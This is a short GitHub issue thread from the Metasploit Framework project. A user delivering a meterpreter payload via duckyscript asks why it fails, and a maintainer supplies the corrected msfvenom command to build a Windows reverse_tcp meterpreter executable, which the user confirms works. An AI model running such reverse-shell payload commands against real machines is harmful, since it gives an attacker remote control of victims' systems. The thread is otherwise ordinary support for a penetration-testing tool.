### ISSUE TITLE
MSFVenom producing unsupported EXE file

### ISSUE THREAD

**Issue by ShadowFlareon** [rapid7/metasploit-framework#18758]
I was testing out some duckyscript and had the latest version of windows 11 home. Then when the duckyscript installed the msfvenom payload I made with: msfvenom -p windows/meterpreter/reverse_tcp LHOST=(lhost) LPORT=87 -f raw -o meterpreter.exe.
When it executed it said the exe file was unsupported. Why is this happening?

**Comment by bcoles** [comment]
You probably want to generate the payload in `exe` format:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(lhost) LPORT=87 -f exe -o meterpreter.exe
```

**Comment by ShadowFlareon** [comment]
ok thanks I tried it and it worked. IDK why the raw format didnt work I have been using it for a long time
